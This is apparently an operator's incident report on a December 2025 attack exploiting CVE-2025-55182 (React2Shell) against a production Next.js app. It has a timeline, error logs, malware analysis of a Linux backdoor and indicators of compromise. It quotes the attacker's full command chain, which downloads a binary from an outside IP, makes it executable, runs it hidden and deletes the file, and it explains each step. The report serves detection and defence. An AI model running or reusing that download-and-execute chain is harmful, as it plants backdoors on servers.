
Real-world attack analysis of CVE-2025-55182 (React2Shell) - React Server Components RCE vulnerability
Real-world attack analysis on a production Next.js application
On December 5, 2025, our production Next.js application was targeted by attackers exploiting CVE-2025-55182 (React2Shell), a critical Remote Code Execution vulnerability in React Server Components. The attack attempted to download and execute a Linux backdoor trojan on our server.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS Score | 9.8 (Critical) |
| Attack Date | December 5, 2025 |
| Attack Outcome | ✅ Blocked (post-patch) |
| Malware Type | Linux Backdoor Trojan |
| Affected Stack | Next.js + React Server Components |
CVE-2025-55182, also known as "React2Shell", is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) in:
The vulnerability exists in the renderToReadableStream() function within React's Flight Server. When processing specially crafted RSC payloads, the server fails to properly sanitize certain input, leading to arbitrary code execution.
Attacker → Malicious RSC Payload → Flight Server → eval() → RCE
The attacker sends a crafted POST request with a malicious serialized payload that gets deserialized and executed on the server.
| Timestamp (UTC) | Event |
|---|---|
| Dec 5, 06:20 | First attack detected via Sentry |
| Dec 5, 06:20 | Payload attempts to execute shell commands |
| Dec 5, 06:20 | Attack partially successful (pre-patch) |
Sentry Error Log (Pre-Patch):
Error: root
at eval (eval at <anonymous>, <anonymous>:3:6)
at nk (chunk.js)
at JSON.parse (<anonymous>)
at n5 (/app/node_modules/next/dist/server/app-render.js)
| Timestamp | Action |
|---|---|
| Dec 4, 14:13 | Upgraded to Next.js 16.0.7 |
| Dec 4, 14:13 | Deployed patched version (v1.0.0-beta-4) |
| Timestamp (UTC) | Event |
|---|---|
| Dec 5, 08:48 | Attack attempt detected |
| Dec 5, 08:48 | Payload execution BLOCKED |
| Dec 5, 08:48 | Error: syntax error: unexpected ";" |
Sentry Error Log (Post-Patch):
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ;
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"
The patch successfully prevented the malicious command from executing.
| Attribute | Value |
|---|---|
| Target URL | https://[REDACTED]/ |
| Method | POST |
| User-Agent | Python Requests 2.31 |
| Origin | Automated attack script |
The attacker attempted to execute the following command chain:
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim
Breakdown:
| Step | Command | Purpose |
|---|---|---|
| 1 | wget http://45.76.155.14/vim -O /tmp/vim | Download malware |
| 2 | chmod +x /tmp/vim | Make executable |
| 3 | nohup /tmp/vim > /dev/null 2>&1 & | Run in background, persist after logout |
| 4 | rm -f /tmp/vim | Delete evidence |
| Component | Version |
|---|---|
| OS | Alpine Linux 3.23.0 |
| Runtime | Node.js v20.19.6 |
| Framework | Next.js 16.0.7 (patched) |
| Container | Docker |
| Attribute | Value |
|---|---|
| Filename | vim (disguised as legitimate tool) |
| SHA256 | 0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce |
| File Type | ELF 64-bit LSB executable, x86-64 |
| Language | Go (compiled binary) |
| File Size | ~4.7 MB |
Detection Rate: 13/72 (18%)
| Vendor | Detection Name |
|---|---|
| DrWeb | Linux.BackDoor.Siggen.389 |
| AhnLab-V3 | Backdoor/Linux.Agent.4780032 |
| Kaspersky | HEUR:Trojan.Linux.Agent.gen |
| ESET-NOD32 | Linux/Agent.PX Trojan |
| Avast/AVG | ELF:Agent-BQE [Trj] |
| AliCloud | Trojan:Linux/Agent.ff565f70 |
| Antiy-AVL | Trojan/Linux.Agent.px |
| Rising | Trojan.Agent/Linux!8.13268 |
| SentinelOne | Static AI - Suspicious ELF |
| Tencent | Malware.Linux.Generic.1c03c8b9 |
| Zillya | Trojan.Agent.Linux.5292 |
VirusTotal Link: View Analysis
ELF Header:
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000 ..>.....`.E.....
Identified Capabilities:
| Capability | Evidence |
|---|---|
| HTTP/HTTPS Client | net/http, *http.Client |
| TLS Encryption | crypto/tls, crypto/aes |
| SOCKS5 Proxy | socks, socks5 |
| DNS Resolution | net/dns/dnsmessage |
| Strong Crypto | chacha20poly1305, Ed25519 |
Extracted Strings (Relevant):
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack
| Severity | Rule | Source |
|---|---|---|
| LOW | ET POLICY HTTP traffic on port 443 (POST) | Proofpoint ET Open |
| LOW | ET DNS Query for .cc TLD | Proofpoint ET Open |
Type: Linux Backdoor Trojan
Capabilities:
| Type | Value | Description |
|---|---|---|
| IP Address | 45.76.155.14 | Malware distribution server |
| URL | http://45.76.155.14/vim | Malware download URL |
| Hosting | Vultr VPS | Cloud provider |
| TLD | .cc | C2 domain uses .cc TLD |
| Type | Value |
|---|---|
| SHA256 | 0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce |
| SHA1 | [Calculate if needed] |
| MD5 | [Calculate if needed] |
| Filename | vim (disguised) |
| File Type | ELF 64-bit x86-64 |
| File Size | ~4.7 MB |
| Indicator | Description |
|---|---|
wget to external IP | Downloads from non-standard URLs |
Files in /tmp/ | Suspicious executable in temp directory |
nohup + background execution | Persistence attempt |
| Immediate file deletion | Evidence cleanup |
| Python Requests User-Agent | Automated attack tool |